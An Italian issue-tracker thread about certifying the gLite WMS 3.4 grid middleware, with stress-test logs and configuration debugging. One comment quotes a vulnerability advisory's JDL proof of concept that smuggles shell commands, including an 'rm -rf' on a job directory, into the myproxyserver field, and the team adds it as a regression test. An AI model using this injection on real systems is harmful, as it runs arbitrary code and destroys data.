[IGIRTC-92] WMS v. 3.4 certificazione Created: 01/Aug/12  Updated: 24/Oct/12  Due: 03/Sep/12  Resolved: 24/Oct/12

Status: Closed
Project: IGI-MW - Release-Testing-Certification
Component/s: None
Affects Version/s: None
Fix Version/s: None
Security Level: Public (Visbile by non-authn users.)

Type: Task Priority: Major
Reporter: Doina Cristina Duma Assignee: Doina Cristina Duma
Resolution: Fixed Votes: 0
Labels: IGI-Testing
Remaining Estimate: 2 weeks
Time Spent: Not Specified
Original Estimate: 2 weeks

Attachments: File 20120828_164529_EMI2-INSTALLWMS34.log     File 20120828_174227_EMI2_CERT_INSTALL_wms3.4_SL6.log     File 20120828_174227_EMI2_CERT_INSTALL_wms3.4_SL6.log     File 20120830_111225_EMI1TOEMI2UPDATE_TEST.log    

 Description   

WMS v. 3.4 è pronto per la certificazione
task savannah:
https://savannah.cern.ch/task/?21060

link nella twiki:
https://wiki.italiangrid.it/twiki/bin/view/IGIRelease/TestingWms
per il task già creato, da aggiornare:
https://wiki.italiangrid.it/twiki/bin/view/IGIRelease/WMSTask21060

repositories da usare - vedi info in:
https://wiki.italiangrid.it/twiki/bin/view/IGIRelease/IGITestCert#Certification_Repositories
(aggiornero con i rpm necessari)

link precertificazione:
https://wiki.italiangrid.it/twiki/bin/view/WMS/WMS34_precertification_test



 Comments   
Comment by Doina Cristina Duma [ 24/Oct/12 ]

rilasciato con EMI 2 Update 4 (2.4.0-1)

Comment by Doina Cristina Duma [ 24/Oct/12 ]

rilasciato con EMI 2 Update 4 (2.4.0-1)

Comment by Danilo Nicola Dongiovanni [ 15/Oct/12 ]

ciao,
integrazione WMS - ARGUS ha dei problemi. non riesco a capire se e' una roba di configurazione o un bug.
Ho aperto il seguente EMT Incident:
https://savannah.cern.ch/task/index.php?36503

vediamo cosa dice Valery

Comment by Doina Cristina Duma [ 12/Oct/12 ]

perfetto!

Comment by Fabio Capannini [ 12/Oct/12 ]

Ho committato in github i fix alla testsuite che ho prodotto durante la certificazione.

Comment by Fabio Capannini [ 11/Oct/12 ]

Mi sembra che loginfo generi i file Output_Part*
Prova a spostarli e a rilanciare loginfo. Vedi se li ricrea e se contengono solo zeri.

Comment by Sergio Traldi [X] (Inactive) [ 11/Oct/12 ]

Si ho riprovato a rilanciarlo, non esce nessun wanig ma ottendo sempre quel 0 0 0 su DONE NOtDone Aborted.
Nel log niente di utile:

*****************************
Thu Oct 11 14:20:36 2012

Function Called:
/usr/bin/glite-wms-job-status

Options specified:
-v 2
-o USER0_54.out
--noint
-i USER0_54.jobid
*****************************
--No Errors found--

        • Error: API_NATIVE_ERROR ****
          Error while calling the "Job:getStatus" native api
          Unable to retrieve the status for: https://cert-27.cnaf.infn.it:9000/9N9Oq8GXBx6_pWMRT0aQ-g
          glite.lb.Exception: edg_wll_JobStatus: Connection refused: edg_wll_gss_connect()
          at glite::lb::Job::status[./src/Job.cpp:87]
Comment by Danilo Nicola Dongiovanni [ 11/Oct/12 ]

sto reinstallando cert-27 per problemi disco.
Per info: cert-13 e cert-27 diventano EMITESTBED.

Comment by Fabio Capannini [ 11/Oct/12 ]

Avevo chiesto a Marco di quei Connection Timeout quando si fa una status e lui dice che e' normale, puo' succedere.

Se riprovi a lanciare loginfo.sh continua a dare quel problema?
Cosa dice /tmp/glite-wms-job-status_500_9894_1349965236.log ?

Comment by Sergio Traldi [X] (Inactive) [ 11/Oct/12 ]

Ciao,
lo Stess Test e' finito:
----> SUBMISSION FAILED (after 63 seconds)!
2592 jobs submitted in 4148 seconds: 1/1/9 (min/avg/max)
288 submission(s) fail(s)
Test finishes at Thu Oct 11 13:38:56 CEST 2012

Ho poi fatto :
[traldi@cert-25 StressTest]$ cd Test_1349782511

[traldi@cert-25 Test_1349782511]$ cd output/

[traldi@cert-25 output]$ ls
USER0_0.jobid USER0_16.jobid USER0_22.jobid USER0_29.jobid USER0_35.jobid USER0_41.jobid USER0_48.jobid USER0_54.jobid USER0_10.jobid USER0_17.jobid USER0_23.jobid USER0_2.jobid USER0_36.jobid USER0_42.jobid USER0_49.jobid USER0_5.jobid USER0_11.jobid USER0_18.jobid USER0_24.jobid USER0_30.jobid USER0_37.jobid USER0_43.jobid USER0_4.jobid USER0_6.jobid USER0_12.jobid USER0_19.jobid USER0_25.jobid USER0_31.jobid USER0_38.jobid USER0_44.jobid USER0_50.jobid USER0_7.jobid USER0_13.jobid USER0_1.jobid USER0_26.jobid USER0_32.jobid USER0_39.jobid USER0_45.jobid USER0_51.jobid USER0_8.jobid USER0_14.jobid USER0_20.jobid USER0_27.jobid USER0_33.jobid USER0_3.jobid USER0_46.jobid USER0_52.jobid USER0_9.jobid USER0_15.jobid USER0_21.jobid USER0_28.jobid USER0_34.jobid USER0_40.jobid USER0_47.jobid USER0_53.jobid

quindi il test ha generato quei 54 file con dentro i jopid allora ho fatto:

[traldi@cert-25 output]$ ../../loginfo.sh -e 54

ottengo tanti:

        • Warning: API_NATIVE_ERROR ****
          Error while calling the "Job:getStatus" native api Unable to retrieve the status for: https://cert-27.cnaf.infn.it:9000/CLafO4hUd2NiLV48AHqA7w glite.lb.Exception: edg_wll_JobStatus: Connection timed out: edg_wll_gss_connect() at glite::lb::Job::status[./src/Job.cpp:87]
        • Warning: API_NATIVE_ERROR ****
          Error while calling the "Job:getStatus" native api Unable to retrieve the status for: https://cert-27.cnaf.infn.it:9000/9yID9ijHDO00xUBU5duB1g glite.lb.Exception: edg_wll_JobStatus: Connection timed out: edg_wll_gss_connect() at glite::lb::Job::status[./src/Job.cpp:87]

e alla fine:

      • Log file created ***
        Possible Errors and Debug messages have been printed in the following file: /tmp/glite-wms-job-status_500_9894_1349965236.log
        Results:
        DONE : 0
        NOTDone: 0
        Aborted: 0
                                                • Total : 0

Questo mi succedeva anche le altre volte. Idee?

Ahh ho provato a mandare un job e fare il retrieve dell'output piu' volte senza nessun problema da quella UI su quel WMS.

Comment by Doina Cristina Duma [ 11/Oct/12 ]

Danilo,
vedi la mia mail a Marco quando gli ho detto che il task è certificato.

Le nuove funzionalita (le 2) non sono state testate per vari mottivi.
Facendo adesso il deployment lo puoi fare ed eventualmente se non fa rimandiamo tutto.

Comment by Danilo Nicola Dongiovanni [ 11/Oct/12 ]

Se ben ricordo il wms 3.4 integra ARGUS.
ho messo su una regola su argus, ma vedo dal siteinfo.def che argus e' disabilitato per cert-13 e cert-27.
Immagino che nessuno abbia provato l'integrazione o si? - se no va testata?

Comment by Sergio Traldi [X] (Inactive) [ 11/Oct/12 ]

Ciao altri problemi.

Da questa mattina alle 9 circa lo stress test non riesce a mandare jobs mi spiego.
E' cominciato da UI con:

Submission n. 2627:
Thu Oct 11 09:21:32 CEST 2012: user 0 is submitting...

Connecting to the service https://cert-27.cnaf.infn.it:7443/glite_wms_wmproxy_server

Warning - Unable to delegate the credential to the endpoint: https://cert-27.cnaf.infn.it:7443/glite_wms_wmproxy_server
Unknown Soap fault
Method: Soap Error

Switching to next WMProxy Server...

Error - Operation failed
Unable to find any endpoint where to perform service request

Questo per un po' di sottomissioni. Al che ho guartdato dentro il WMS e c'era il servizio ice not running.

Ho riavviato tutti i servizi gLite e sembra ripartito il tutto.
Ma dopo 3 o 4 sottomissioni di DAG. ICE e' di nuovo morto e nei log trovo:

[root@cert-27 siteinfo]# tail -f /var/log/wms/ice.log
2012-10-11 10:52:57,813 ERROR - IceLBContext::testCode - Got error Resource temporarily unavailable - edg_wll_LogEventProxy():
Resource temporarily unavailable;; Logging library ERROR:
Resource temporarily unavailable;; edg_wll_DoLogEventServer(): edg_wll_log_proxy_connect error
No such file or directory;; edg_wll_log_proxy_connect()
2012-10-11 10:56:01,123 FATAL - AbsDbOperation::do_query - Query [INSERT INTO stats (timestamp,ce_timestamp,status) VALUES ('1349945699', '1349944400', '3');] failed due to error [unable to open database file]
2012-10-11 10:59:19,566 FATAL - AbsDbOperation::do_query - Query [PRAGMA default_cache_size=200;] failed due to error [unable to open database file]
2012-10-11 11:01:03,667 FATAL - AbsDbOperation::do_query - Query [PRAGMA default_cache_size=200;] failed due to error [unable to open database file]
2012-10-11 11:06:04,165 FATAL - AbsDbOperation::do_query - Query [PRAGMA default_cache_size=200;] failed due to error [unable to open database file]
2012-10-11 11:08:15,817 FATAL - AbsDbOperation::do_query - Query [PRAGMA default_cache_size=200;] failed due to error [unable to open database file]
2012-10-11 11:09:39,216 FATAL - AbsDbOperation::do_query - Query [PRAGMA default_cache_size=200;] failed due to error [unable to open database file]

con dmesg nessun errore, mentre in /var/log/messages ci sono delle voci che dicono che puppet non ha spazio libero on device:
Oct 11 11:17:07 cert-27 puppet-agent[30013]: Could not run Puppet configuration client: No space left on device - /var/lib/puppet/state/puppetdlock

Anche se non mi smebra vero:
[root@cert-27 log]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_vol01-lv_root
12G 5.4G 5.6G 49% /
tmpfs 738M 4.0K 738M 1% /dev/shm
/dev/sda1 485M 72M 389M 16% /boot
/dev/sdb 21G 5.3G 14G 28% /var/lib/mysql

Or ora ho anche cancellto dei log del gridftp per liberare 200MB e restarto i servizi ma il problema persise.

Comment by Sergio Traldi [X] (Inactive) [ 10/Oct/12 ]

gia' fato il piu' recente e' quello postato da Te.
Ciao

Comment by Fabio Capannini [ 10/Oct/12 ]

Provane qualcun altro fra quelli presenti in /var/log/wms/glite-wms-purgeStorage.log-20121010

Comment by Sergio Traldi [X] (Inactive) [ 10/Oct/12 ]

Questo job id non lo vedo IQ7epMsIb0fj6zy-39Y5bQ tra i miei, ma forse perche' vedo solo fino a ieri sera alle 19:00 e quello e' sicuramente stato sottomesso prima se prova a fare il purge.
Ultimamente ho riconfigurato (ieri mattina verso le 10:30) dopodiche' non ho piu' riavviato nessun servizio essendoci il lo Stess Test attivo.
Se si verifica un altro controllo subito se e' uno dei miei.

Comment by Fabio Capannini [ 10/Oct/12 ]

Per quanto riguarda il riempimento di mysql si potrebbe chiedere ad Alvise se e' normale, anche se si tratta di uno stress test, ovvero quando ice dovrebbe rimuovere i job dal db.

Per il problema del - nel jobid posso mandare io una mail a wms-devel.

Inoltre ho notato che il log del purger e' pieno di messaggi come il seguente:

09 Oct, 19:08:51 -E: [Error] query_job_status(purger.cpp:134): https://cert-27.cnaf.infn.it:9000/IQ7epMsIb0fj6zy-39Y5bQ: edg_wll_JobStat [2] No such file or directory(no matching jobs found)
09 Oct, 19:08:51 -I: [Info] operator()(purger.cpp:306): https://cert-27.cnaf.infn.it:9000/IQ7epMsIb0fj6zy-39Y5bQ: forced removal, unknown/removed L&B job
09 Oct, 19:08:51 -E: [Error] remove_path(purger.cpp:256): LB event logging failed No such file or directory (2) - edg_wll_LogEventProxy():
No such file or directory;; Logging library ERROR:

Sembra che la sandbox contenga delle dir appartenenti a job che non sono registrati nell'L&B. Potrebbe anche essere un problema relativo a quando era andato giu' L&B pero' non mi convince.
Ultimamente Sergio hai riavviato il bkserverd per caso?
Riesci a verificare se sono job lanciati dallo stress test o meno?
Non vedo perche' non dovrebbero essere registrati nell'L&B.

Comment by Sergio Traldi [X] (Inactive) [ 10/Oct/12 ]

Concordo con tutti e 2 che lui genera quel jobID che poi non gli piace quando prova a trasferire la Sandbox perche' ha quel -b.
Aggiungo che si sono verificati altri errori di quersato tipo con:

-2

terminate called after throwing an instance of 'boost::filesystem::filesystem_error' what(): boost::filesystem::path: invalid name "-2" in path: "SandboxDir/-2/https_3a_2f_2fce...

-w

terminate called after throwing an instance of 'boost::filesystem::filesystem_error' what(): boost::filesystem::path: invalid name "-w" in path: "SandboxDir/-w/https_3a_2f_2fcer...

-4 e -s

Che sia il caso di contattare Marco e Alvise per capire quale puo' essere il problema?
La mia UI e' una EMI2 di produzione:
[root@cert-25 ~]# rpm -qa | grep emi-ui
emi-ui-2.0.0-1.sl5

[root@cert-25 ~]# rpm -qa | grep -i wms | sort
glite-wms-brokerinfo-access-3.4.0-4.sl5
glite-wms-brokerinfo-access-lib-3.4.0-4.sl5
glite-wms-ui-api-python-3.4.0-5.sl5
glite-wms-ui-commands-3.4.0-4.sl5
glite-wms-ui-configuration-3.3.2-3.sl5
glite-wms-utils-classad-3.3.0-2.sl5
glite-wms-utils-exception-3.3.0-2.sl5
glite-wms-wmproxy-api-cpp-3.4.0-4.sl5
glite-wms-wmproxy-api-java-3.4.0-4.sl5
glite-wms-wmproxy-api-python-3.4.0-4.sl5

Comment by Doina Cristina Duma [ 09/Oct/12 ]

Ciao Fabio

ti prego metti solo la risposta altrimenti non capiamo niente se aggiungi anche il commento precedente

Da quello che sembra a me è un pb della creazione "aleatoria" dei path delle sandboxes visto che non gli piace "SandboxDir/-b/"

Comment by Sergio Traldi [X] (Inactive) [ 09/Oct/12 ]

Questa mattina ho dovuto stoppare lo Stess Test e farlo ripartire perche' la macchina cert-27 aveva il disco pieno.
Ho stoppato mysqld smontato la directory /var/lib/mysql cancellato tutto poi rimontata e cacellato tutto. Fatto start di mysqld e riconfigurato. Ho controllato che tutto funzionasse e ho fatto ripartire lo Stess Test.

Mi sono accorto che ho 2 sottomissioni di DAG cosi:
Submission n. 211:
Tue Oct 9 17:05:12 CEST 2012: user 0 is submitting...

Connecting to the service https://cert-27.cnaf.infn.it:7443/glite_wms_wmproxy_server

terminate called after throwing an instance of 'boost::filesystem::filesystem_error'
what(): boost::filesystem::path: invalid name "-b" in path: "SandboxDir/-b/https_3a_2f_2fcert-27.cnaf.infn.it_3a9000_2f-bIzcTPD_5fNh1fn8kky7eHg/input/ls.sh"
./StressTest.sh: line 173: 26483 Aborted /usr/bin/glite-wms-job-submit -a -c $CONF -o $JOBID $opt_res --collection $COLLDIR
----> SUBMISSION FAILED (after 0 seconds)!
Wait 60 seconds before the next submission....

anche se il disco su cert-27 e' ok e la macchina con un top sembra godere di buona salute. idee?

Ha l'aria di essere un bug del wms o della ui (-b viene assegnato come jobid ma poi il wms lo rifiuta).

Comment by Doina Cristina Duma [ 09/Oct/12 ]

aggiunto i regression per:
https://savannah.cern.ch/bugs/?74832
https://savannah.cern.ch/bugs/?75802
https://savannah.cern.ch/bugs/?82995
https://savannah.cern.ch/bugs/?85799
https://savannah.cern.ch/bugs/?87444
https://savannah.cern.ch/bugs/?89443
che mancavano (presi dal pre-certification report)

aggiunti i standard conformance tests - da eseguire sempre (TOADD note in the WMS Cert HOWTO)

aggiunti i report per i test MPI mandati da Enol (TOADD JDL nel WMS HOWTO)

cert e test report attached al task.

Comment by Danilo Nicola Dongiovanni [ 08/Oct/12 ]

il proxy non viene rinnovato e da errore, lo interpreto come un PASSED:
sl5: https://wiki.italiangrid.it/twiki/bin/view/IGIRelease/WMSTask21060SL5#Vulnerability_bug_in_ICE_s_proxy
sl6: https://wiki.italiangrid.it/twiki/bin/view/IGIRelease/WMSTask21060SL6#Vulnerability_bug_in_ICE_s_proxy

Comment by Danilo Nicola Dongiovanni [ 08/Oct/12 ]

ciao,
cerco di verificare il bug @Dal Advisory 4039 vulnerability tkt@

  • elimino il rm /sandbox che e' un po' deleterio.
  • se tutto funzia cerco di implementarlo nella libreria dei regression
Comment by Sergio Traldi [X] (Inactive) [ 08/Oct/12 ]

Lo Stress test si e' piantato dopo 915 secondi dalla sua esecuaione dando i classici errori:

Warning - Unable to register the job to the service: https://cert-27.cnaf.infn.it:7443/glite_wms_wmproxy_server
DAG job registration failed
Error code: SOAP-ENV:Server

Error - Operation failed
Unable to find any endpoint where to perform service request

----> SUBMISSION FAILED (after 25 seconds)!
615 jobs submitted in 915 seconds: 1/1/10 (min/avg/max)
2265 submission(s) fail(s)
Test finishes at Sun Oct 7 17:13:39 CEST 2012

Il disco della macchina cert-27 non era pieno, ma ho trovato in quella macchina il
c-ares-1.7.0-6.el6.x86_64

che porta a dare questo errore:
DNS resolver error;; edg_wll_gss_connect();; GSS Error: Resolver internal error)

nel log: /var/log/wms/wmproxy.log

e blocca tutte le sottomissioni.

Guardando nel yum.log vi vede che alle 3:41 del 6 ottobre si e' instalalta la nuova versione perche' c'era yum.autoupdate installato.

Ho rimosso yu.autoupdate e fatto ripartire il test di sottomissione dello StessTest.
Direi che rilasciamo e lo StessTest lo appendo appena finisce se finisce bene.

Ciao
Sergio

Comment by Doina Cristina Duma [ 08/Oct/12 ]

Dal Advisory 4039 (secondo vulnerability tkt):
Submitting this JDL will cause arbitrary code to be run as 'glite' user on the WMS, when time to renew the user proxy. It must select only CREAM CEs, so as to trigger the ICE's (WMS component that submits to CREAM) proxy renewal mechanism.

[
Executable = "/bin/sleep";
Arguments = "7200";
StdOutput = "out.log";
StdError = "err.log";
OutputSandbox =

{"out.log", "err.log"}

;
myproxyserver="myproxy.cnaf.infn.it; echo MC
was
here > /tmp/intrusion; rm -rf /var/glite/workload_manager/jobdir/; ";
requirements = RegExp("cream.*", other.GlueCEUniqueID);
RetryCount = 0;
ShallowRetryCount = 1;
InputSandbox =

{"tmp"}

]

Using a short proxy results in an almost immediate execution."

Aggiungo sul HOWTO.

Comment by Fabio Capannini [ 05/Oct/12 ]

Ho effettuato il test jdl-attributes su sl6 senza problemi. PASSED

Il test purger ha richiesto qualche operazione in piu' in quanto ho trovato un bug nella testsuite che fa fallire i test 1 e 2, che ho quindi testato a mano.
Vedro' settimana prossima di fissare la testsuite. PASSED anche purger.

Comment by Doina Cristina Duma [ 05/Oct/12 ]

aggiornamento (minute weekly meeting):

Comment by Fabio Capannini [ 03/Oct/12 ]

Certificato il bug #82779 su sl5 e sl6. PASSED

Comment by Doina Cristina Duma [ 02/Oct/12 ]

per il #82779 - come UI si possono considerare:

  • cert-17 o cert31 a cnaf
  • cream-12 o cert-12 a pd

o s'installa econfigura velocemente una macchina SL6 come UI

Comment by Fabio Capannini [ 02/Oct/12 ]

Ho certificato il bug 95584 su sl6.
Il bug 82779, l'altro indicato nella mail di marco, e' invece relativo alla ui e non al wms, quindi non va certificato.

Comment by Fabio Capannini [ 02/Oct/12 ]

C'e' un problema su cert-27: il disco si e' riempito perche' il purger non funziona.
Il purger fallisce perche' LB (che e' sempre cert-27) non risponde.

Ho visto che /etc/gLiteservices non contiene la riga:
/etc/init.d/glite-lb-bkserverd
come invece dovrebbe.

Cerco di indagare e rilancio yaim.

Ho ripristinato il purger su cert-27, su /etc/gLiteservices non saprei, quella riga esiste su cert-13 ma manca in alcuni wms di sviluppo per cui non sono proprio sicuro che debba esistere.

Comment by Fabio Capannini [ 01/Oct/12 ]

Ho ricontrollato la lista dei bachi partendo dal task.
Ho trovato il seguente baco non pre-certificato:
Pid file of ICE and WM has glite ownership (https://savannah.cern.ch/bugs/?91834)

Marco ha chiesto ad Alvise di pre-certificarlo..

Una volta certificato questo baco secondo me non ce ne sono altri ancora da certificare.

Certificato anche questo baco. PASSED

Comment by Doina Cristina Duma [ 28/Sep/12 ]

facciamo adesso usando is sistema di phone-conf cnaf (2552 numero di conf). noi andiamo in sala riunioni

Comment by Doina Cristina Duma [ 28/Sep/12 ]

fermiamoci e sentiamoci di nuovo - non andiamo da neeuns parte cosi.
Fabio - per favore metti i link che descrive come deve essere usata la testsuite e come deve essere fatta la certificazione del WMS, hai fatto tante fino adesso e per la mia mancanza non ho visto dove sono descritti questi detagli. Anch'io per cambiare i default di certi parametri o sempre usato l'opzione "-c" senza pensare che viene fatto un && con altri valori e che per poter sottomettere jobs come user normale devo essere site-admin (root) della macchina o chiedere al root di cambiare certi setting.

Allora ditemi quando vi va bene che ci sentiamo.

Cristina

Io ora sono disponibile..

Comment by Sergio Traldi [X] (Inactive) [ 28/Sep/12 ]

Scusa ma non cpaisco la tua risposta.
Fare un hack ad una ui di produzione non vuol dire che non so come fare di fatti il problema me lo sono risolto, e non e' stato quello di dire uso cert-17 che funziona.

Sto solo dicendo che se un utente tipo CMS si crea il suo file di conf e pensa che facendo quello matcha solo quei requirements NON e' cosi' e va sistemato, am qui parlero' con Alvise.

Dico solo che se Tu per far andare la testsuite modifichi tipo un resolv.conf o installi 2 pacchetti o modifichi altri file di conf da un install standard, sarebbe giusto saperlo, in modo che se Tu sei in ferie e la certificazione deve farla qualcun'altro sa che devo modificare quei file o instalalre quei pacchetti.
Non mi sembra di chiedere una cosa infattibile.
Ciao
Sergio

Comment by Sergio Traldi [X] (Inactive) [ 28/Sep/12 ]

Ciao,

per Fabio:
ero allibito fino a 10 minuti nel pensare che il list match dipendesse da dove risiede la UI e in effetti la cosa e' stata scoperta.
Qualcuno o Fabio o Danilo ha modificato i file di configurazione della UI inerenti al WMS, precisamente:
/etc/glite-wms/dteam/glite_wmsui.conf
e
/etc/glite-wms/dteam/glite_wms.conf

commentando la fatidica righetta:
requirements = other.GlueCEStateStatus == "Production";

Che se pur passando un file di configurazione al comando WMS tipo:
glite-wms-job-list-match -a -c wms_cert-27.conf who.jdl

questo comunque andava a leggere quei 2 file e mette in && i due requisiti:
requirements = ( RegExp("/cream-",other.GlueCEUniqueID) && other.GlueCEStateStatus == "Testing" ) && ( other.GlueCEStateStatus == "Production" )

Come si puo' vedere un CEStateStatus non puo' essere contemporaneamente Testing e Production.

1) Parlero' con Alvise Dorigo per far sistemare questa cosa che NON va bene
2) Chiederei a Fabio (se e' stato lui a modificare i file di conf installati dal WMS) di segnarsi questi hack da qualcxhe parte e metterli disponibili in modo che poi quando si vanno ad usare le cose non ci si trovi con le sorpresine e si perda un sacco di tempo.

Ciao
Sergio

Sergio, va tutto bene fino a che non pensi che qualcuno ti faccia perdere tempo quando semplicemente vuoi fare una cosa e non sai come.

Comment by Sara Bertocco [X] (Inactive) [ 28/Sep/12 ]

Nel test della purge a me falliscono i test 1 e 2.
Devo ripeterli a mano? I passi sono gli stessi fatti per il test3 su SL5 ?

A mano non li ho mai eseguiti. Dovresti guardare cosa fa la testsuite. Forse ti conviene capire perche' falliscono e rilanciare la testsuite finche' non passano.

Comment by Sergio Traldi [X] (Inactive) [ 27/Sep/12 ]

Scusate, sbagliavo query io. Matchano i CE di Testing.
ciao
Sergio

Comment by Sergio Traldi [X] (Inactive) [ 27/Sep/12 ]

Ciao Danilo/Fabio
il cert-bdii-04.cnaf.infn.it non matcha CE con descrizione Testing in GlueCEStateStatus e' per quello che i miei job sono tutti abort.
Ma ho controllato che anche il WMS di Fabio (cert-13.cnaf.infn.it) usa quel BDII, quindi anche a lui non dovrebbe matchare niente.
Potete sistemare?
Grazie
Ciao
Sergio

Comment by Sergio Traldi [X] (Inactive) [ 27/Sep/12 ]

Ciao Sara,
pensi di riuscire a sistemare quel WMS o vuoi che provo io?
Io vorrei lanciare domani anche pomeriggio lo Stress Test cosi' che finisca lunedi' e lui lavora nel week end.
Ciao
Sergio

Comment by Sara Bertocco [X] (Inactive) [ 27/Sep/12 ]

Quel wms ha funzionato finche` non l'ho riconfigurato per mettere
BDII_HOST="egee-bdii.cnaf.infn.it"
da quel momento non ha piu` matchato niente. Allora ho riconfigurato con
SITE_BDII_HOST="cert-bdii-04.cnaf.infn.it"
ma non va piu`
Mi falliscono tutti i test da ieri, per quello non ho piu` messo niente
nella wiki

Comment by Sergio Traldi [X] (Inactive) [ 27/Sep/12 ]

Ciao,
si anche io avevo 57 file di utenti:

[traldi@cert-25 output]$ ls
USER0_0.jobid USER0_16.jobid USER0_22.jobid USER0_29.jobid USER0_35.jobid USER0_41.jobid USER0_48.jobid USER0_54.jobid USER0_8.jobid
USER0_10.jobid USER0_17.jobid USER0_23.jobid USER0_2.jobid USER0_36.jobid USER0_42.jobid USER0_49.jobid USER0_55.jobid USER0_9.jobid
USER0_11.jobid USER0_18.jobid USER0_24.jobid USER0_30.jobid USER0_37.jobid USER0_43.jobid USER0_4.jobid USER0_56.jobid
USER0_12.jobid USER0_19.jobid USER0_25.jobid USER0_31.jobid USER0_38.jobid USER0_44.jobid USER0_50.jobid USER0_57.jobid
USER0_13.jobid USER0_1.jobid USER0_26.jobid USER0_32.jobid USER0_39.jobid USER0_45.jobid USER0_51.jobid USER0_5.jobid
USER0_14.jobid USER0_20.jobid USER0_27.jobid USER0_33.jobid USER0_3.jobid USER0_46.jobid USER0_52.jobid USER0_6.jobid
USER0_15.jobid USER0_21.jobid USER0_28.jobid USER0_34.jobid USER0_40.jobid USER0_47.jobid USER0_53.jobid USER0_7.jobid

Solo che il risultato sembra catastrofico:
[traldi@cert-25 output]$ ../../loginfo.sh -e 57

Results:
DONE : 0
NOTDone: 25
Aborted: 71925
------------------------
Total : 71950

Dentro i file di abort ottengo:
[traldi@cert-25 output]$ head USER0_1.abort
https://cert-27.cnaf.infn.it:9000/2uO5gdj4Gtg6BCKjxnMnfA CeUnknown request expired
https://cert-27.cnaf.infn.it:9000/3h1zG3T-RA5qY0g5If64FQ CeUnknown request expired
https://cert-27.cnaf.infn.it:9000/7ZL1xWUx1rKq8X5s1HEEew CeUnknown request expired
https://cert-27.cnaf.infn.it:9000/BiM879TuT3-Dyc4cuJmGvw CeUnknown request expired
https://cert-27.cnaf.infn.it:9000/BlxBxaKSy9jRn1eU1-6gFQ CeUnknown request expired
https://cert-27.cnaf.infn.it:9000/BuT-AtOiAPRU6jOCz3AVFQ CeUnknown request expired
https://cert-27.cnaf.infn.it:9000/CS6Fkfi6-lCFo3axQIArkQ CeUnknown request expired
https://cert-27.cnaf.infn.it:9000/DAmY_ABSnqW1hUIdJzIjhQ CeUnknown request expired
https://cert-27.cnaf.infn.it:9000/DiPfwLm-1S4uCitNE7eKEQ CeUnknown request expired
https://cert-27.cnaf.infn.it:9000/Jj6Ux1u-RaKDQu4zQ_1LZQ CeUnknown request expired

idee?
Sara ma quel WMS funzionava almeno minimalmente prima che io lanciassi il test?

Ciao
Sergio

Comment by Sergio Traldi [X] (Inactive) [ 27/Sep/12 ]

Fatto lo stess test sul cert-27.cnaf.infn.it WMS SL6

Metto qui il risultato:

EXECUTION:
[traldi@cert-25 StressTest]$ ./StressTest.sh -t 2880 -n 25 -c ~/wms_cert-27.conf -j ls.jdl
Test starts on mon sep 24 17:27:12 CEST 2012: submit 2880 collections (of 25 nodes) with a frequency of 60 seconds using 1 users.

RESULT:
2877 jobs submitted in 15312 seconds: 1/5/26 (min/avg/max)
3 submission(s) fail(s)
Test finishes at Wed Sep 26 17:25:26 CEST 2012

Ho pure lanciato questo comando (come fatto da Fabio per SL5)

[traldi@cert-25 output]$ ../../loginfo.sh -e 57

Ma ci sta impiegnado una vita e mi da tanti:

      • Log file created ***
        Possible Errors and Debug messages have been printed in the following file:
        /tmp/glite-wms-job-status_500_32747_1348738409.log

/usr/lib64/python
======================== glite-wms-job-status success ========================
Bookkeeping information has been found and stored in the file:
/home/traldi/certification/StressTest/Test_1348500358/output/USER0_1.out
==========================================================================

appena finisce se da un responso lo aggiungo.
Ciao
Sergio

Sergio, il numero 57 va sostituito con quanti USER0_xy.out ci sono nella directory output del tuo test.

Comment by Doina Cristina Duma [ 26/Sep/12 ]

aggiunto regression per i vulnerability, manca forse qualcosa di più specifico per il 4039.
aggiunto anche metà della verifica del 89668.

Comment by Doina Cristina Duma [ 26/Sep/12 ]

Note "aggiornamento stato - lunedi, 24.09.2012":

  • problemi con ARC:
    • tkt riportato coem "misbehavior"non si riferisce ai problemi di ARC.
    • non è stato aggiunto nessun riferimento al fatto che la sottomissione funziona con ARC <=11.05 e non funziona con ARC 12.05
    • Cristina contata Marco
  • parallel jobs - random failures:
    • non è molto chiaro, le certificaz precedenti non riportano pb
    • Cristina contata Marco
  • perusal - failed
    • Cristina contata Marco
  • feedback
    • una nuova var è stata aggiunta, che neccessità essere definita manualmente (cosa succedde se non è definita? serve aggiungere una nota nelle Release Notes di come va settata?verificato il glite_wms.template e non è deifnita in nessun modo
    • nelle certificazioni precedenti questo test funzionava
    • Cristina contata Marco
  • vulnerability regressions
    • per Cristina
    • Cristina contata Marco per aggiungere link ai SVE
    • si dovrebbe già conoscere cosa si doveva fare inquanto tutti i 2 vulnerability sono stati certificati da noi
  • 89668
    • descrizione del test fa riferimento a "grep the source"
    • Cristina contata Marco
    • DA CORREGGERE i riferimenti a "Please refer to the pre-certification page."
      • nel report di test e certificazione non c'è nessun link, e non dovrebbe esserci, alla pagina di precertificazione
  • 88128
    • Cristina contata Marco, giusto per capire meglio, -lcg-CE non dovrebbe interessarci più
  • 40370
    • Cristina contata Marco
Comment by Sara Bertocco [X] (Inactive) [ 25/Sep/12 ]

I test di Job purge sono messi a PASSED, ma poi dentro uno e`
>>> TEST FAILED <<<
===>
===> >>> failure reason: 1 test(s) fail(s): ['Test 3: Test proxy cache purging'] <<<

Va bene cosi` o e` una svista?

Se guardi bene il test 3 e' ripetuto di seguito ed e' passed.

Comment by Sara Bertocco [X] (Inactive) [ 25/Sep/12 ]

No, ho
BDII_HOST="cert-bdii-04.cnaf.infn.it"
prima di ripetere il test riconfiguro. Grazie.

Comment by Doina Cristina Duma [ 25/Sep/12 ]


no, ho veirficato e non è un nuovo pachetto, è lo stesso pachetto usato da CREAM, stessa versione, per cui è già nel repository di produzione, per cui basta fare:
yum install kill-stale-ftp

Dirgli di aggiungere anche:
yum install emi-wms condor-emi kill-stale-ftp

nelle note d'install & configure.

Comment by Fabio Capannini [ 25/Sep/12 ]

Marco ha aggiunto al task wms3.4 l'rpm kill-stale-ftp. Ora immagino vada aggiunto al repo..

Comment by Fabio Capannini [ 25/Sep/12 ]

This test requires egee-bdii.cnaf.infn.it as the bdii, and therefore DEFAULTREQ=other.GlueCEStateStatus == "Testing" should not be defined.

i parametri dell'se sono gli stessi usati per il test jdl-attributes.

Sara hai configurato egee-bdii.cnaf.infn.it come bdii?

Comment by Sara Bertocco [X] (Inactive) [ 25/Sep/12 ]

Mi fallisce il test 7 del list match con questo errore:

Test 7: try a matching with data requirements

===> ERROR: Unable to find any CEs mathing the job requirements

Chi devo configurare come SE per farlo funzionare? c'e` qualche altra configurazione da sistemare?

